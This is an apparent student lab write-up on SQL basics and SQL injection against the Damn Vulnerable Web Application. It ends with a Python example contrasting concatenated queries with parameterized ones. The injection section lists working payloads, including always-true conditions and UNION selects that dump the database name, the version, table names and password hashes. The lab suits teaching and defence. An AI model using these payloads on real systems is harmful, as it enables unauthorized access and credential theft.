SQL Injection Lab

TOPICS:

Basic SQL Commands

Querying a database with SQL

Deleting data with SQL

SQL Injection Techniques


Basic SQL Commands

  • Show available databases.

Command:

show databases;


  • Create a new database called test.

Command:

create database test;


  • Choose the test database to work with.

Command:

use test;


  • Create tables in the database and define the columns. The commands will include the column names, the types of data for each column, and the max length allowed for each value.

Commands:

create table users (name varchar (30), account integer, balance decimal (10,2));

create table personal (name varchar(30), address varchar(30), city varchar(20), telephone bigint);


  • Display the tables within the test database.

Command:

show tables;

  • Populate the users and personal tables with records. The commands will include the values for each column in the table.

Commands:

insert into users values ('John', 123, 10.00);

insert into users values ('Joe', 456, 20.00);

insert into personal values ('John', '1313 Mockingbird Lane', 'Mockingbird Heights', 3105552368);

insert into personal values ('Joe', '1313 Cemetery Lane', 'Greenbrier', 1313131313);


  • Display all the data in each table.

Commands:

select * from users;

select * from personal;


Querying a database with SQL

  • In the test database created earlier, write a query to retrieve the users and their balance from the users table.

Command:

select name, balance from users;


  • Write a query to retrieve the names and telephone numbers from the personal table.

Command:

select name, telephone from personal;


  • Write a join query to retrieve the users’ names, balances, and telephone numbers from both tables. The name column is the foreign key.

Command:

select users.name, users.balance, personal.telephone from users join personal on users.name=personal.name;


Deleting data with SQL

  • Delete a record from the personal table.

Command:

delete from personal where name='Joe';


  • Remove the personal table from the database.

Command:

drop table personal;


  • Delete the whole test database.

Command:

drop database test;


SQL Injection Techniques

We ran a series of queries from the User ID field on the login portal of the Damn Vulnerable Web Application.


  • Use a true statement to test if the app is vulnerable to SQL injection.

Command:

1=1

  • The following query has been executed by the target database:

select first_name, surname from “some table” where user_id=1


  • Display all false/empty records and all true/not empty records.

Command:

1' or '0'='0

  • The following query has been executed by the target database to dump the users:

select first_name, surname from “some table” where user_id = '1' or '0'='0';


  • Query for database info and database user info.

Command:

1' or 1=1 union select database(), user()#

  • Query for the database version.

Command:

1' or 1=1 union select null,version()#

  • Identify the tables in the target database.

Command:

1' or 1=1 union select null, table_name from information_schema.tables#

We found a users table.

  • See if any password fields are associated with the users table.

Command:

1' or 1=1 union select user, password from users#

We can see that the query returned some password hashes.
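
Added example (not part of the original lab and not DVWA's own code): the always-true input from the second test above, run against a query built by string concatenation and against the same query with a bound parameter. An in-memory SQLite database stands in for the lab's MySQL server, and the table contents and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample rows standing in for the lab's target table.
    db = sqlite3.connect(":memory:")
    db.execute("create table users (user_id integer, first_name text, surname text)")
    db.executemany("insert into users values (?, ?, ?)",
                   [(1, "John", "Doe"), (2, "Joe", "Bloggs"), (3, "Ann", "Lee")])
    return db

def lookup_vulnerable(db, user_id):
    # The input is pasted between quotes, so a quote inside the input ends the
    # string literal and everything after it is parsed as SQL.
    sql = "select first_name, surname from users where user_id = '" + user_id + "'"
    return db.execute(sql).fetchall()

def lookup_parameterized(db, user_id):
    # The ? placeholder passes the input as a bound value; it is never SQL text.
    sql = "select first_name, surname from users where user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def lookup_validated(db, user_id):
    # Defence in depth: a user ID is numeric, so reject anything else up front.
    if not user_id.isdigit():
        raise ValueError("user_id must be numeric")
    return lookup_parameterized(db, int(user_id))

if __name__ == "__main__":
    db = make_db()
    payload = "1' or '0'='0"                  # the input from the lab step above
    print(lookup_vulnerable(db, "1"))          # one row, as intended
    print(lookup_vulnerable(db, payload))      # every row in the table
    print(lookup_parameterized(db, payload))   # no rows: compared as a plain value
    try:
        lookup_validated(db, payload)
    except ValueError as err:
        print("rejected:", err)
```
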






